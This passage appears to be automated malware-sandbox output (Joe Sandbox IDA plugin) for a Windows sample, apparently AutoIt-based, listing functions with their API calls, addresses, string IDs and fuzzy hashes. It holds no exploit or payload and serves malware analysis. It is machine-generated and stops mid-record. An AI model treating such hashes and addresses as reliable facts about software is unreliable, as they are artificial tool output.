                          • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                          • String ID:
                          • API String ID: 2223660684-0
                          • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                          • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                          • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                          • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                          APIs
                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                          • LineTo.GDI32(?,?,?), ref: 00447326
                          • EndPath.GDI32(?), ref: 00447336
                          • StrokePath.GDI32(?), ref: 00447344
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                          • String ID:
                          • API String ID: 2783949968-0
                          • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                          • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                          • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                          • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                          • GetCurrentThreadId.KERNEL32 ref: 004364A3
                          • AttachThreadInput.USER32(00000000), ref: 004364AA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                          • String ID:
                          • API String ID: 2710830443-0
                          • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                          • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                          • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                          • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                          APIs
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                          • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                            • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                            • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                          • String ID:
                          • API String ID: 146765662-0
                          • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                          • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                          • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                          • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                          APIs
                          • GetDesktopWindow.USER32 ref: 00472B63
                          • GetDC.USER32(00000000), ref: 00472B6C
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                          • ReleaseDC.USER32(00000000,?), ref: 00472B99
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                          • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                          • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                          • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                          APIs
                          • GetDesktopWindow.USER32 ref: 00472BB2
                          • GetDC.USER32(00000000), ref: 00472BBB
                          • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                          • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                          • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                          • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                          • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                          APIs
                          • __getptd_noexit.LIBCMT ref: 00415150
                            • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                            • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                            • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                            • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                            • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                          • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                          • __freeptd.LIBCMT ref: 0041516B
                          • ExitThread.KERNEL32 ref: 00415173
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                          • String ID:
                          • API String ID: 1454798553-0
                          • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                          • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                          • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                          • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _strncmp
                          • String ID: Q\E
                          • API String ID: 909875538-2189900498
                          • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                          • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                          • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                          • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: U$\
                          • API String ID: 4104443479-100911408
                          • Opcode ID: 835b85672203460d32fbae7ee09f86de6f9ff03da8fa91cdddc3cb8863709e71
                          • Instruction ID: 856fd8c118fd9d88a35ce60e305a75550171e0483a96a15f1a05c3eab080688b
                          • Opcode Fuzzy Hash: 835b85672203460d32fbae7ee09f86de6f9ff03da8fa91cdddc3cb8863709e71
                          • Instruction Fuzzy Hash: D2C1B070E002499FEF14CF69C4907AEFBF2AF85304F2881AED451A7341D739A946CB55
                          APIs
                          • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                          • String ID: AutoIt3GUI$Container
                          • API String ID: 2652923123-3941886329
                          • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                          • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                          • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                          • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove_strncmp
                          • String ID: U$\
                          • API String ID: 2666721431-100911408
                          • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                          • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                          • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                          • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                          APIs
                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                          • __wcsnicmp.LIBCMT ref: 00467288
                          • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Connection__wcsnicmp_wcscpy_wcslen
                          • String ID: LPT
                          • API String ID: 3035604524-1350329615
                          • Opcode ID: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                          • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                          • Opcode Fuzzy Hash: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                          • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: \$h
                          • API String ID: 4104443479-677774858
                          • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                          • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                          • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                          • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memcmp
                          • String ID: &
                          • API String ID: 2931989736-1010288
                          • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                          • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                          • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                          • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: \
                          • API String ID: 4104443479-2967466578
                          • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                          • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                          • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                          • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                          APIs
                          • _wcslen.LIBCMT ref: 00466825
                          • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CrackInternet_wcslen
                          • String ID: |
                          • API String ID: 596671847-2343686810
                          • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                          • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                          • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                          • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                          APIs
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: '
                          • API String ID: 3850602802-1997036262
                          • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                          • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
